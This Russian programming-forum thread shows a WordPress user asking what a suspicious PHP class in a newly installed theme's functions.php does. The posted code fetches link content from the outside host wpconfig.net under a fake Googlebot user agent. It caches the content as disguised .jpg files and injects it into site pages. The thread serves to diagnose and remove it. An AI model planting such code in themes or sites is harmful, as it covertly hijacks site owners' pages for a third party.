Форум программистов, компьютерный форум, киберфорум
WordPress
Войти
Регистрация
Восстановить пароль
Карта форума Темы раздела Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.80/5: Рейтинг темы: голосов - 5, средняя оценка - 4.80
Мы сами всего творцы!
60 / 23 / 1
Регистрация: 06.06.2012
Сообщений: 151
1

Понять назначение кода

23.09.2017, 18:01. Показов 881. Ответов 2
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Здравствуйте, уважаемые форумчане.
Недавно поставил на свой сайт (WordPress) новый шаблон и только сегодня увидел у него в коде (functions.php) следующий код:
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
class Get_links
{
    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime = 21600;
    var $_socket_timeout = 5;
    function get_remote()
    {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";
        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);
        if (function_exists('file_get_contents'))
        {
            $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"Referer: {$req_url}\r\n". "User-Agent: {$_user_agent}\r\n" ) );
            $context = stream_context_create($opts);
            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2]; return $data;
        }
        return '<!--link error-->';
    }
    function return_links($lib_path)
    {
        $links_class = new Get_links();
        $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg';
        $_cache_lifetime = $links_class->_cache_lifetime;
        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data); return $data;
        }
        elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0)
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data); return $data; 
        }
        else
        {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
Он был написан в одну строку, мне пришлось приводить в нормальный вид. Вобщем он мега-крайне подозрительно выглядит, но я не могу понять, что же именно он делает. Удалить его я не могу, потому что перестает работать пол шаблона

Просьба помочь кто чем сможет. Спасибо всем заранее!

P.S. wpconfig.net в начале кода - не мой домен.
0
Лучшие ответы (1)
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
23.09.2017, 18:01
Ответы с готовыми решениями:

Не могу понять назначение двух библиотек
привет вы извените конечно покажусь просто нубом каким-то но смотрел везде в гугле здесь не могу...

Узнать назначение кода
Всем привет. Надеюсь мне скоро отпишут. Есть у меня вот это: import socket import time serv_ip...

Объяснить назначение элемента кода
C++ зачем запятая перед пабликом? ,public PhysObject

Каково назначение приведенного кода
Прочитал в книжке код ... public int this { get { ... } set { ... } } ...

2
Эксперт PHP
4925 / 3920 / 1620
Регистрация: 24.04.2014
Сообщений: 11,441
23.09.2017, 22:41 2
Лучший ответ Сообщение было отмечено Alexell как решение

Решение

https://habrahabr.ru/sandbox/47832/
1
Мы сами всего творцы!
60 / 23 / 1
Регистрация: 06.06.2012
Сообщений: 151
23.09.2017, 23:03  [ТС] 3
Jewbacabra, Спасибо большое)

Добавлено через 12 минут
После того как строку из comments.php удалил, смог удалить весь этот код из functions.php и сайт работает как положено. Проблема решена.
0
23.09.2017, 23:03
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
23.09.2017, 23:03
Помогаю со студенческими работами здесь

Определить назначение программного кода
Procedure TForm1.Button1Click(Sunder:TObject) var s,x,i,a,b:integet; Begin...

Назначение строк кода в программе
Подскажите пожалуйста, что делают следующие строчки кода в программе Stroka2 bb = new...

Определить назначение программного кода
Procedure TForm1.Button1Click(Sender:Tobject); Var s,x,i,a,b:Integer; begin memo1.Clear;...

Объяснить назначение кода аwk
awk '/^H/{count++}!/^H/ || count != 2' source.file &gt; result.file Правильно ли я понял, что сначала...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru